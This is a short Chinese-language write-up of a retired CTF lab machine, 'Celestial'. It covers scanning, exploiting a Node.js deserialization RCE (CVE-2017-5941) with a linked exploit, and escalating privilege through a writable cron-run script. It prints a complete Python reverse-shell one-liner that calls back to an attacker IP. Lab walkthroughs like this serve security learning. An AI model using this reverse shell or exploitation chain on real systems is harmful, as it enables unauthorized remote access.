本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機是作者購買VIP使用退役靶機操作，顯示IP地址為10.10.10.85

本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描

執行命令autorecon 10.10.10.85 -o ./Celestial-autorecon

就開了個3000埠，訪問看看

再重新整理一下看到上面資訊，看下burpsuite的請求資訊

發現base64編碼資訊，解碼一下得到上述明文，隨便改個數字3在burpsuite上配置編碼為base64得到如下報錯資訊

看顯示是跟nodejs有關，搜尋了下對應名稱是否含有漏洞，確認存在反序列化遠端程式碼執行漏洞，參考連結：https://help.aliyun.com/knowledge_detail/50422.html 再搜尋下exploit ，具體exploit地址：https://hd7exploit.wordpress.com/2017/05/29/exploiting-node-js-deserialization-bug-for-remote-code-execution-cve-2017-5941/

exploit程式碼：

https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py

具體操作如下：

成功反彈shell，獲取了user.txt資訊，嘗試提權，執行了sudo -l需要無果，看到當前目錄含有一個指令碼

顯示指令碼是在執行，下載pspy到目標靶機執行得到如下結果

確認檔案script.py可以寫入檔案，使用vi編輯器寫入反彈程式碼

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.5",8844));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["
 
/bin/sh","-i"]);

等待反彈shell，差不多等了5-10分鐘成功反彈shell